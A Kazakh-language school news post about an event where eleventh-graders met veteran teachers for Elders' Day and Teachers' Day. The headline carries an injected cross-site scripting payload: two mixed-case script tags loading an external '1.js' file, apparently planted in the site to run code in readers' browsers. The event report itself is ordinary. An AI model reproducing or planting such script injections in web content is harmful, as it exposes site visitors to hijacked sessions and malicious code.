Қазан айының алғашқы мерекелері қарттар әрі мұғалімдер мерекесі тоғысқан күніне орай мектебімізде 29-қыркүйек күні "Үлкендер жолы-ұлылық, ұрпағы жүрер ұғынып!"<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
05.10.2021
Қазан айының алғашқы мерекелері қарттар әрі мұғалімдер мерекесі тоғысқан күніне орай мектебімізде 29-қыркүйек күні "Үлкендер жолы-ұлылық, ұрпағы жүрер ұғынып!" тақырыбында 11 сынып оқушылары мектептің ардагер ұстаздары Усембаева М. А., Оразбаева Б. М. сыр-сұхбат жүргізді. Алғашқы құттықтау сөз мектеп директоры Биримжанова Л.А.берілді. Тіршіліктің тынысын, уақыттың жүрісін сезіндіретін, білім әлемінің сырын білетін, өзінің алдынан өтіп жатқан шәкірттерінің жырын жүрекке түйген тағылым иелері, ардагер ұстаздарымыз, еңбек жолы үлгі-өнеге екенін, адал болу, мамандық таңдауда қателеспеу керек екенін оқушыларға сұхбаттасу барысында жан-жақты түсіндірді. Мамандығын дұрыс таңдаса, талай-талай биіктерді бағындыратынын. Балалар бұл кездесуден үлкен әсер алды. Апайлармен естелік суретке түсіп, "мерекеңіз құтты болсын" деп, сыйлық табыстап, мерекелік іс-шарамызды аяқтадық.